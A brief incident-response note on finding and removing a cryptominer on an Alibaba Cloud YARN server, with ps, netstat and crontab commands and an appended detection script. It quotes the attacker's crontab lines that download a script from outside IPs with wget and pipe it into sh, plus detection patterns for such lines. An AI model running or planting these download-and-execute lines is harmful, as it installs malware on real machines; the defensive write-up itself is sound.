A cryptomining program turned up on Alibaba Cloud
Linux: look up a process name by PID
Use the top command to find the processes with high CPU usage
ps aux | grep <PID>
ps -ef | grep <PID>
Check the yarn process information
ps -ef | grep yarn
yarn 46185 1 99 May03 ? 4-19:04:28 /tmp/java -c /tmp/w.conf
The miner running as the yarn user (its crontab entries, process and outbound connection)
* * * * * wget -q -O - http://185.222.210.59/cr.sh | sh > /dev/null 2>&1
* * * * * wget -q -O - http://46.249.38.186/cr.sh | sh > /dev/null 2>&
tcp 0 1 172.31.**.**:44128 185.222.210.59:80 SYN_SENT 27001/wget
Reference sites
https://labitacoranet.wordpress.com/2018/05/16/forensic-analysis-of-a-cryptocurrency-mining-attack-in-a-big-data-cluster/
https://zhangnew.com/hadoop-yarn-safe.html
https://blog.csdn.net/BleakRed/article/details/80625551
https://www.linuxidc.com/Linux/2014-09/106497.htm
https://www.jb51.net/hack/186589.html
http://www.freebuf.com/vuls/173638.html
Ports 8088 and 8090
Check which IPs have connected to the port
netstat -anp |grep 8042
The intrusion usually comes in through port 8088; block access to port 8088 from the public internet
Remove the crontab entries
crontab -l -u yarn
ps -ef | grep yarn
crontab -r -u yarn
Delete the unrelated file /var/tmp/java
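An added check script, not part of the original post, that runs the three checks above over captured command output: a remote script piped straight into sh in the yarn crontab, a process executing out of a temp directory like /tmp/java -c /tmp/w.conf, and non-private peers connected to the YARN ports 8042/8088/8090. The sample crontab, ps and netstat lines are constructed, and the URL and addresses in them are placeholders, not real indicators.

```shell
#!/bin/sh
# Added example, not from the original post. Each function reads captured
# output on stdin (crontab -l -u yarn, ps -ef, netstat -anp) and prints
# only the suspicious lines, so it can be run over saved evidence offline.

# Cron lines that fetch a remote script and pipe it directly into a shell
suspicious_cron_lines() {
    grep -E '(wget|curl)[^|]*\|[[:space:]]*(ba)?sh'
}

# ps -ef lines whose command (8th field) runs from a world-writable temp dir
suspicious_procs() {
    awk '$8 ~ /^(\/tmp|\/var\/tmp|\/dev\/shm)\//'
}

# Remote IPs talking to the YARN ports that are not loopback or RFC1918;
# in netstat -anp output the local address is field 4, the remote is field 5
external_yarn_peers() {
    awk '$1 ~ /^tcp/ && $4 ~ /:(8042|8088|8090)$/ {
        split($5, r, ":"); ip = r[1]
        if (ip !~ /^(10\.|127\.|192\.168\.|172\.(1[6-9]|2[0-9]|3[01])\.)/) print ip
    }' | sort -u
}

# Constructed samples; the URL and public addresses are placeholders (TEST-NET)
SAMPLE_CRON='* * * * * wget -q -O - http://198.51.100.7/cr.sh | sh > /dev/null 2>&1
0 2 * * * /usr/local/bin/rotate-logs.sh'

SAMPLE_PS='root      1     0  0 May03 ?        00:00:03 /sbin/init
yarn  46185     1 99 May03 ?        4-19:04:28 /tmp/java -c /tmp/w.conf
yarn   2210     1  0 May03 ?        00:10:12 /usr/lib/jvm/bin/java -Dproc_nodemanager'

SAMPLE_NET='tcp  0 0 172.31.5.20:8088  10.0.0.15:51234    ESTABLISHED 2210/java
tcp  0 0 172.31.5.20:8088  203.0.113.44:40211 ESTABLISHED 2210/java
tcp  0 1 172.31.5.20:44128 198.51.100.7:80    SYN_SENT    27001/wget'

# Stand-alone run over the constructed samples
printf '%s\n' "$SAMPLE_CRON" | suspicious_cron_lines
printf '%s\n' "$SAMPLE_PS"   | suspicious_procs
printf '%s\n' "$SAMPLE_NET"  | external_yarn_peers
```

On a live host, replace the printf lines with `crontab -l -u yarn | suspicious_cron_lines`, `ps -ef | suspicious_procs` and `netstat -anp | external_yarn_peers`.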